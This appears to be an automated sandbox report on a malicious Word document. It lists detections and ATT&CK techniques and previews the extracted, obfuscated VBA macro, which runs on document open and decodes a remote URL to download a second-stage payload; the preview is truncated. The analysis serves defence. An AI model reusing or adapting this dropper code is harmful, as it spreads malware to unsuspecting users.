MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute code. Heuristics indicate the use of CreateObject and CallByName, common for executing arbitrary code. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this document acts as a dropper for additional malware. The VBA code, though obfuscated, likely facilitates the download and execution of a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17635 bytes |
SHA-256: c66503505feb07d50ec5c2508301703f49e02e624d229e01cbf53970ddb82298 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function PMmxnB(ByVal FMMPVHTbw As Integer) As String
UQFTEy
wzWDv 8198
If lrvLdCj(8828, "") Then
jBIjNyouvmDjuZ
UMKsc = 7276
amcOQBVMAHQ 4905, "BA"
uulJVwWV
End If
uwxKqoYt = "57t0"
PMmxnB = ""
End Function
Private Function LHdoeDF() As Integer
kWkvKF False
UMvSTEjQQtdo 2233, ""
kYNuKdGcXy
LHdoeDF = 5204
End Function
Private Function sFFKohPr() As String
If SxAYB(9126) Then
VpjxxxILBU = 8634
ReScrY
Else
dvLltDAdr True
tlBKZc
PscOoNlivvjVe
End If
XxaKlBBEiwsB = True
sFFKohPr = "Znk"
End Function
Private Sub Document_Open()
HbvpnFGXMtrPD.QkFqo
End Sub
Private Function qVXMxGRegfq(ByVal rWOwHQqHKEIHX As String, ByVal VRQsIciOFZgIV As Integer) As Integer
CRJJtMFDJXlSIv 4374
vQXPlmS
DfSEQeDrzhEE
If DZfYDwaRcn Then
tCYnVJvhlUbR
Else
iBxlTeQUcPmwG = ""
hkXdcPpzrWS
MlSmVFiCZf
End If
qVXMxGRegfq = 1337
End Function
Attribute VB_Name = "HbvpnFGXMtrPD"
Private Function QpWQFGO(ByVal HdAnWlaNIz As Object, ByVal VhyKwMEeN As Boolean) As Object
Dim adepRLp As Integer
vnaswLCkTAZh = False
Set QpWQFGO = HdAnWlaNIz
End Function
Public Sub QkFqo()
On Error GoTo pDLFwlKautcQv
TPZzicDvM.rJJMTEZVP
PWSGB = True
TPZzicDvM.EPGTLXwCepyQ
RZbWCYRVhWMa
Exit Sub
BRzeBNhLSKGhf = 5724
pDLFwlKautcQv:
End Sub
Private Sub RZbWCYRVhWMa()
Dim hdFkI As String
Dim waIpRGWDZiRe As Integer
KNURYpuv = "Cw"
ZXuGQCUOW 5737, nsqBpxK.apOMYUw, qHPUHHm
bgvzJHkcMGqd = 6867
nsqBpxK.HoCPV 6258, nsqBpxK.apOMYUw
End Sub
Public Function SrpCB(ByVal RQLDuur As String) As Object
Dim tlwrSv As String
Dim NQxbFmonX As Boolean
LsmbtnVaksC = "oVvzn"
Set SrpCB = QpWQFGO(CreateObject(RQLDuur), True)
End Function
Private Function bEYHoKcHI(ByVal gytdmwj As String) As Integer
If DSOTwUvjFiW(8404, "FDcHA") Then
lBNwQhEt = 7354
ARxoWvRulT
jFFDZi
XZDnw
HwKBuwX = "iVM"
Else
cyzPYW
xqCEcfekpEWtTP "KZp", 4897
xQuuTxZDMmO
End If
lIlymvSKqzN 4147, 3708, 9625
bEYHoKcHI = 2465
End Function
Private Sub ZXuGQCUOW(ByVal AKplpwFHFBvr As Integer, ByVal znUaXPfMQqo As String, ByVal HZnqo As String)
Dim kzbVg As Integer
Set yLqnaN = OwMnAVyJ.AvuZz(HZnqo, 7913, True)
OwMnAVyJ.hIBgm "oCs", JDRtoJeGQ, 3895, yLqnaN
tkEPgwXr = True
nsqBpxK.NhxrDRHkVbw 6655, cOZDtT.zUAarF(2621, yLqnaN, "nSi4O", LijYrJ.CZjnJSVjPfZqzm("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "kQ", znUaXPfMQqo
End Sub
Private Function qHPUHHm() As String
qHPUHHm = LijYrJ.CZjnJSVjPfZqzm("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function JDRtoJeGQ() As String
JDRtoJeGQ = LijYrJ.CZjnJSVjPfZqzm("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "LijYrJ"
Private Sub fddPCUYJMJ()
LhxQglFUR False, 4187, False
EPaZwUdx 3928, True, 3091
End Sub
Public Function rEaAElxyfPRvw(ByVal vbetFjDhruWIG As String, ByVal UinSduCp As Boolean, ByVal bChUKHQI As String) As String
Dim DLntgTr As Boolean
Dim GPxvkuEqdAV As Integer
dZLDAaaeOy = "eHSwY"
rEaAElxyfPRvw = vbetFjDhruWIG & bChUKHQI
End Function
Private Sub VDrOyaJjBw()
EBuRN 3835, "A", 8764
UPzME 5484, 760, 7177
qxkogahArxVjV = 3182
rQKlPmTTawfTE
End Sub
Private Function RMzXT(ByVal ADwMbXO As String, ByVal LGaXEhswwT As String) As String
If Not nPZax.PtuRIatqtAwkod("m2M8", LGaXEhswwT, ADwMbXO, "") Then
RMzXT = LGaXEhswwT
End If
End Function
Private Function QNLYGBuSjDvViA() As Integer
KAaLYjQi = ""
QNLYGBuSjDvViA = 1
End Function
Public Function CZjnJSVjPfZqzm(ByVal zEGRICsR As String, ByVal WyWDSJBJ As String) As String
Dim FosfRcjYbP As String
Dim dGpNzOAbdA As String
Dim ltCOeYkF As Integer
For gGvYm = QNLYGBuSjDvViA To nPZax.GFvBV(zEGRICsR)
FosfRcjYbP = RMzXT(WyWDSJBJ, nPZax.yGSfVZOhjYZLTf(zEGRICsR, 9996, gGvYm, True))
CZjnJSVjPfZqzm = rEaAElxyfPRvw
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.